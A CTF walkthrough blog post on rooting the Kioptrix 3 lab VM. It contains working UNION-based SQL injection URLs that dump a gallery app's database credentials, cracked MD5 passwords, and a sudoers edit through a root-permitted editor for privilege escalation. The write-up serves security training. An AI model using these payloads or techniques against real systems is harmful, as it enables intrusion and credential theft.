Back to Posts

Kioptrix 3

Posted in CTF

 Checkout SlayerLabs.com!
Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -


Kioptrix 3

Once you have the Kioptrix 3 ip make sure to update your host file per the setup notes.

After our initial scan we only see two ports open, 22 (Ubuntu) and 80. Since ssh is a fairly secure service we can jump right into the web app.

We’ll start by running Nikto in the background while we put our end-user hat. Clicking links, tabs, viewing source along with any Nikto findings we find the following:

  • A possible username of “loneferret”
  • Running CMS called Lotus CMS
  • A photo gallery app called Gallarific.
  • phpmyadmin version 2.11.3.0
  • Apache 2.2.8

After quickly trying a few default credentials to get past the login page, we come up empty (ex: admin:admin, lonferret:admin, admimn:password, etc). We can always brute force the webform, but we’ll do some more enumeration.

We can use searchsploit to dig a bit more into the web app. Trying Lotus CMS, phphmyadmin, gallarific, we come up with a good hit - a Gallarific SQLi…

SQLi Gallarific

We’ll do this manually to learn a bit more..

We can start by testing the number of columns by using “id=1 order by x–” where x=1,2,3,etc until you notice an error. When you hit that error you’ll know the columns are x-1.

http://kioptrix3.com/gallery/gallery.php?id=1 order by 7--

Here we find the number of columns to be 6, so now we can try this..

http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,2,3,4,5,6--

and we see columns 2 and 3 are vulnerable to a SQL injection.

A quick test shows us the current db and sql version

http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,database(),version(),4,5,6--

We can search the DB tables, find the column names and loot the precious creds.

id=1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--

id=1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=char(100,101,118,95,97,99,99,111,117,110,116,115)

id=1 union select 1,group_concat(username,0x3a,password),3,4,5,6 from dev_accounts

Great, now we have some hashed creds in which we’ll use hashcat to crack.

dreg:0d3eccfb887aabd50f243b3f155c0f85
loneferret:5badcaf789d3d1d09794d8f021f40f0e

These hashes look like MD5, but use hash-identifier or https://hashcat.net/wiki/doku.php?id=example_hashes to verify.

Hashcat gives a successful output in no time.

5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

We try to ssh with these credenatials and get a low priv shell on both users although dreg has a restricted shell, so we’ll use loneferrets ssh acct.

dreg@Kioptrix3:~$ cd /root
-rbash: cd: restricted

PrivEsc

Reading the CompanyPolicy.README we geta juicy bit of information about running the “ht” app as root.

To verify this:

sudo -l

This will give us the permissions to edit any files on the system and edittings the /etc/sudoers file will be our target.

Running sudo ht /etc/sudoers > ALT + F > Open > /etc/sudoers > change loneferret ALL=(ALL) ALL

Then once saved…

oneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/home/loneferret# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt

Great, we have root.

Lessons learned

  • SQL injection - Great box to test SQLi manually
  • Any creds looted, make sure to try through different open services (mysql creds same as ssh in this case)
  • Target other webapps installed vs going after/spending a lot of time on phpmyadmin servers. It can be a common default web app.
  • Google and enum the web app for any unknown directories, credentials or version info.

Custom Cyber Ranges >>

https://slayerlabs.com

Read Next

Kioptrix 2